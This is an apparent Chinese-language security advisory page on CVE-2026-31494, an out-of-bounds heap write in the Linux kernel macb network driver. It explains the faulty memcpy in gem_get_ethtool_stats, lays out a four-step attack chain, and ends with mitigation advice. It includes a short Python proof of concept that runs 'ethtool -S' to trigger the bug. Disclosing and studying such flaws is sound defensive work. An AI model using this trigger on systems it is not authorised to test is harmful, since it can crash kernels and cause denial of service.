CVE-2026-31494 CVSS 7.8 高危

CVE-2026-31494: Linux内核macb驱动越界写漏洞

披露日期: 2026-04-22

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31494

漏洞类型

越界写入

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核macb驱动程序存在越界写入漏洞。在获取网卡统计信息时，`gem_get_ethtool_stats`函数错误地使用最大队列数（MACB_MAX_QUEUES）来复制数据，而实际分配的内存是基于活动队列数计算的。当活动队列数小于最大值时，会导致向分配区域之外的内存写入数据，引发内核崩溃或潜在的权限提升。

技术细节

该漏洞源于Linux内核macb驱动中统计信息收集逻辑的缺陷。`gem_get_sset_count`函数根据当前激活的队列数量正确计算了统计信息所需的内存大小，并分配了相应空间。然而，`gem_get_ethtool_stats`函数在执行`memcpy`操作时，使用了常量`MACB_MAX_QUEUES`作为长度参数，而非当前活动的队列数。这种不匹配导致在活动队列数少于最大值时，写入的数据量超过了分配的缓冲区大小，造成堆越界写入。攻击者需拥有本地低权限账号，通过调用`ethtool -S`等命令触发该漏洞，导致内核崩溃或执行任意代码。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的本地低权限用户访问权限。

STEP 2

步骤2

攻击者执行`ethtool -S <interface>`命令，请求获取网卡统计信息。

STEP 3

步骤3

macb驱动的`gem_get_ethtool_stats`函数在处理请求时，因计算错误发生越界写入。

STEP 4

步骤4

导致内核恐慌（DoS）或潜在的权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-31494
# This PoC triggers the OOB write by calling ethtool stats on a device with fewer active queues than max.
import subprocess
import sys

def trigger_poc(interface):
    try:
        # Calling ethtool to get stats triggers gem_get_ethtool_stats
        # This attempts to copy more data than allocated if queue count mismatches
        result = subprocess.run(['ethtool', '-S', interface], capture_output=True, text=True)
        print("Output:", result.stdout)
        print("Error:", result.stderr)
        print("If kernel crashes or KASAN reports, PoC successful.")
    except Exception as e:
        print(f"Exception: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <network_interface>")
    else:
        trigger_poc(sys.argv[1])

影响范围

Linux Kernel (修复前版本)

防御指南

临时缓解措施

建议立即更新Linux内核至修复版本。如果无法立即更新，可通过限制本地用户对ethtool命令的执行权限（如通过sudoers配置）来降低被利用的风险，直到内核完成升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表